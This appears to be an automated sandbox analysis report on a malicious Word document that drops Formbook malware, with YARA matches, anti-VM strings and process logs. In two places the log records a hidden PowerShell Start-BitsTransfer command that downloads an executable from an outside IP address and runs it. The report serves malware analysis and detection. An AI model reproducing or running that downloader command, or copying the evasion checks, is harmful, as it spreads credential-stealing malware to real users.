Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BABD8	28_2_012BABD8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0133FA2B	28_2_0133FA2B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01345A4F	28_2_01345A4F
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344AEF	28_2_01344AEF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01280D20	28_2_01280D20
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01352D07	28_2_01352D07
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01351D55	28_2_01351D55
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A2D50	28_2_012A2D50
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01342D82	28_2_01342D82
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134CC77	28_2_0134CC77
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B4CD4	28_2_012B4CD4
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01351FF1	28_2_01351FF1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0135DFCE	28_2_0135DFCE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A6E30	28_2_012A6E30
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0130AE60	28_2_0130AE60
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01331EB6	28_2_01331EB6
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01352EF7	28_2_01352EF7

Source: RFL_PO 69002.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open			Name: Document_Open

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: String function: 0128B150 appears 177 times
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: String function: 012DD08C appears 51 times
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: String function: 01315720 appears 85 times

Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Documents\nothinglittle.exe C:\Users\Public\Documents\nothinglittle.exe
Source: C:\Users\Public\Documents\nothinglittle.exe	Process created: C:\Users\user\AppData\Local\Temp\nothinglittle.exe C:\Users\user\AppData\Local\Temp\nothinglittle.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Documents\nothinglittle.exe C:\Users\Public\Documents\nothinglittle.exe	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process created: C:\Users\user\AppData\Local\Temp\nothinglittle.exe C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Jump to behavior

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000008.00000003.269897366.00000246F5519000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.275702172.0000000000D12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.431614413.00000000007D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491282271.00000000007D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.269964305.00000246F5559000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.432793873.0000000000D12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.270059630.00000246F555A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.430227602.0000000001416000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.432322254.00000000007D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nothinglittle.exe PID: 6988, type: MEMORY
Source: Yara match	File source: Process Memory Space: nothinglittle.exe PID: 6172, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe, type: DROPPED
Source: Yara match	File source: 9.2.nothinglittle.exe.d10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.nothinglittle.exe.d10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.7d0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.7d0000.0.unpack, type: UNPACKEDPE

Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_03024E5C pushad ; iretd	9_2_03024E5D
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_03025265 push ecx; retf	9_2_0302526C
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_030262B5 push 8BFFFFFEh; retf	9_2_030262BB
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00417B68 push ebx; ret	28_2_00417B69
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CEB5 push eax; ret	28_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CF6C push eax; ret	28_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CF02 push eax; ret	28_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CF0B push eax; ret	28_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_004167E2 push esi; retf	28_2_004167F5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0040C78D push ecx; iretd	28_2_0040C78E
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012DD0D1 push ecx; ret	28_2_012DD0E4
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126322C push eax; retf	28_2_0126321C
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01269271 push es; iretd	28_2_01269278
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126427E pushad ; retf 000Dh	28_2_0126427F
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126225E push eax; retf	28_2_0126321C
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01264288 pushad ; retf	28_2_01264289
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126A7C0 push es; iretd	28_2_0126A7C1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01263F9F pushad ; ret	28_2_01263FA0

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4580			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1329			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6660	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6168	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe TID: 4604	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Analysis Report RFL_PO 69002.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Source: powershell.exe, 00000001.00000002.285192085.0000000005580000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: nothinglittle.exe, 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: powershell.exe, 00000001.00000002.285192085.0000000005580000.00000004.00000001.sdmp	Binary or memory string: d:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: nothinglittle.exe, 00000009.00000002.436095929.0000000005740000.00000002.00000001.sdmp, explorer.exe, 0000001D.00000000.456709985.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001D.00000000.456979386.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: nothinglittle.exe, 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 0000001D.00000000.452020297.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000001D.00000000.457446382.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: nothinglittle.exe, 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: explorer.exe, 0000001D.00000000.452057636.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 0000001D.00000000.457920896.00000000088C3000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1SPS0
Source: nothinglittle.exe, 00000009.00000002.436095929.0000000005740000.00000002.00000001.sdmp, explorer.exe, 0000001D.00000000.456709985.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
Source: nothinglittle.exe, 00000009.00000002.436095929.0000000005740000.00000002.00000001.sdmp, explorer.exe, 0000001D.00000000.456709985.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: nothinglittle.exe, 00000009.00000002.436095929.0000000005740000.00000002.00000001.sdmp, explorer.exe, 0000001D.00000000.456709985.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Process token adjusted: Debug	Jump to behavior

Source: explorer.exe, 0000001D.00000000.438472962.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 0000001D.00000000.439042458.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001D.00000000.439042458.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001D.00000000.439042458.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
